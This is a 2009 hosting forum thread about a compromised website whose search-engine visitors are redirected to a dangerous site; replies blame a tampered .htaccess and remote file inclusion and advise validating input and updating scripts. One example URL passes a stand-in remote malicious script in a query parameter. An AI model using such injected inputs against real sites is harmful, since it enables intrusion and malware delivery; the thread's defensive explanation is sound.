Google Search Link Going To Another Site
Posted 04 May 2009 - 01:29 PM
I have a website hosted at TCH.
The domain name is trini-chat dot com.
I've noticed lately that sometimes when I do a search for my site on Google and I click on the link it goes directly to another domain (http://europpc dot com/search.php?iw=1&links=trini+chat) and then that redirects to another site that Firefox deems dangerous.
Any ideas what may be causing this?
Posted 04 May 2009 - 09:49 PM
If you find code like this, it is a common symptom of sites that have been compromised. When visitors go to your site from search engine results, they get redirected to the malicious site. If they go straight to your site, they don't get redirected.
The .htaccess file would most likely have been changed by a malicious PHP script that the hacker "tricked" one of your .php web pages into running.
It looks like many of your pages use input (query string) parameters such as "?name=Forums". When your script receives data by this way, it is important that it checks it carefully to guard against something called "remote file inclusion" <- a term to do a web search on.
For example, if someone calls your page with ....filename.php?name=hxxp://someothersite.com/maliciousscript.txt, then your site, if your PHP code doesn't guard against it, will retrieve the malicious script and run it. You have to ensure that incoming values of "name" are only acted upon if they are legitimate values that you expect. Otherwise, the incoming data should be ignored.
The above is the most common reason for this type of redirection.
It looks like you are using FlashChat. Look it up at http://secunia.com/advisories/search/. I know it has had some security vulnerabilities in the past, but I don't recall which ones or whether they are of a type that would be relevant to your current problem.
Edited by SteveW, 04 May 2009 - 09:49 PM.
Posted 10 May 2009 - 01:35 AM
Posted 10 May 2009 - 02:33 AM
As for the strange code, I would either clean it out myself or ask the help desk if its something they can help me with, then publish the file again and see if everything works as expected.
TotalChoice Hosting, Inc.
Any links or suggestions for third party software/sites should be used at your own risk. My opinions and recommendations are not necessary those of TCH and TCH is not responsible.
As a Forum Moderator I can assist in answering many of your hosting related questions. However, I am unable to answer questions about specifics relating to your account such as billing and server related issues. Should you need assistance in these areas, please contact our Help Desk or our many other options. Another good place to find answers is with our help pages, tutorials and movie tutorials.
Web Hosting by Total Choice Web Hosting - 24/7 Help Desk
Posted 10 May 2009 - 03:23 AM
If you look in the text of your static code pages on the server and don't find the malicious code in the page, it could be that it's stored in the database and being retrieved by whatever process is getting data out of the db to build the output page.
It's important to keep all scripts updated to their latest versions.
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users